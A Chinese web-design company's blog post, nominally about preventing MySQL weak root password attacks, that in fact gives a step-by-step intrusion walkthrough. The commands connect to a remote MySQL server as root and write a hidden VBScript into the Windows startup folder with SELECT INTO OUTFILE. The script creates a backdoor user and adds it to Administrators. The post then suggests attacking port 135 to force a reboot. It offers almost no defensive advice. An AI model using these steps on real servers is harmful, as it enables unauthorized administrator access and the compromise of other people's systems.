• 首页
  • 服务内容
  • 经典案例
  • 互联圈子
  • 招聘合伙
  • 关于我们
  • 新闻资讯

    News information
  • 新锐观点

    New point of view
  • 知识共享

    The knowledge sharing

19

2017-10

防止root密码弱口令mysqI的攻击方法

  本文主要介绍关于防止mysql用户root密码弱口令的攻击,大家可以看下自己的mysql root是不是也存在这样的安全隐患。

  1、连接到对方MYSQL 服务器

  mysql -u root -h 192.168.0.1

  mysql.exe 这个程序在你安装了MYSQL的的BIN目录中。

  2、让我们来看看服务器中有些什么数据库

  mysql>show databases; MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。

  3、让我们进入数据库

  mysql>use test; 我们将会进入test数据库中。

  4、查看我们进入数据库中有些什么数据表

  mysql>show tables; 默认的情况下,test中没有任何表的存在。

  以下为关键的部分

  5、在TEST数据库下创建一个新的表;

  mysql>create table a (cmd text); 好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。

  6、在表中插入内容

  mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

  mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " );

  mysql>insert into a values

  ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " );

  注意双引号和括号以及后面的"0"一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!  7、好了,现在我们来看看表a中有些什么

  mysql>select * from a;我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步

  8、输出表为一个VBS的脚本文件

  mysql>select * from a into outfile "c:docume~1alluse~1“开始”菜单程序启动a.vbs"; 我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意""符号。

  9、看到这大家肯定明白了,就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢,因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!好了,找个工具攻击135让服务器重启吧,几分钟以后你就是管理员了。

  总结:不管你什么时候都需要注意自己服务器的安全否则就别谈其它应用程序了,本文章讲述的mysql root密码弱口令的攻击只是安全应用中的冰山一解而己。

 防止root密码弱口令mysqI的攻击方法

  防止root密码弱口令mysqI的攻击方法 图片源于:智先网络科技


上一篇:

防止root密码弱口令mysqI的攻击方法

下一篇:

几种方法总结PHP页面传递参数值

热门点击

  • 一个合格的企业网站应该怎么建设

  • 用户至上的时代,公众号怎么提高用户的体验度

  • 关于落地页的五个UI设计小技巧

  • 全民互联网趋势,卖红薯的老大爷都用了支付宝、微信

  • 网络营销如何才能把握用户心理?

  • 郑州网站建设公司哪家好 怎么选择网站建设公司

相关案例

  • 风尚同和·大宅设计

  • 重庆云创服装有限公司

  • MAI+-幻视觉

  • 睿晟广告

  • 钻石世家中国区

  • 白龙马创新汽车电商平台

  • 生鲜平台

  • HOTEMALL豪猫

  • 佰嘉恒泰

  • 品行之旅

  • 抗战纪念馆

  • 欣砾婴儿玩具

  • ASC精品酒业

  • 尊师鞋业

  • 乌瑞亚化妆品

  • 东沣雕塑

  • 浙江紫金港投资控股

  • 青荷古筝

  • 立诚科技

  • 浙江佑平律师事务所

  • 莫斯空

  • 多美尼可网站

  • 有观文创

  • 光影兄弟

  • 百年咨询

  • 维卡空间-生活第三空间

  • 翼华科技有限公司

  • 辽京制造

  • 我的时代酒店

  • 沈阳航天新光集团有限公司

  • 成都图腾精工建筑装饰

  • 宠福来动物美容医院

  • 港仕梁行装饰工程公司

  • 汉王

  • 林特油画布有限公司

  • 迈途装饰

  • 农家乐网站设计

  • 喜骑

  • 春龙自动化

  • 福喜威海商场

  • 贺兰神葡萄

  • 兰芳园

  • LB内衣

  • 瑞绅葆官网

  • 瑞特科ARITCO官网

  • 塔伦饮料

  • 唐巴乐微型投影机

  • 颜值商城

  • 悦兴制药

  • New-Nutri

  • 德瑞福网站

  • 第一现场行车记录仪

  • 金盾信息安全等级保护评估中心

  • 惠生集团

  • 中环电力服务

智先科技

服务内容招聘合伙

互联圈子关于我们

帮助支持

网站建设法律声明

软件开发隐私条款

联系我们

电话:0371-56628979 15225080839 QQ:931717919 627880117

地址:郑州市金水路与未来路交叉口升龙大厦12层1201 邮箱:934667168@qq.com

手机端网站

微信公众号

  • 高品质定制

  • 跨终端自动兼容

  • 节约开发成本

  • 开发周期短

  • 一体化服务

智先网络科技有限公司 版权所有  违者必究   豫ICP备17041336号 郑州网站建设  百元建站  千元建站   全网营销  传统企业互联网+   建网站 找智先  超级互联网战略服务商

  • 在线沟通,请点我

  • 建站热线:

    0371-56628979

    售后电话:

    15225080839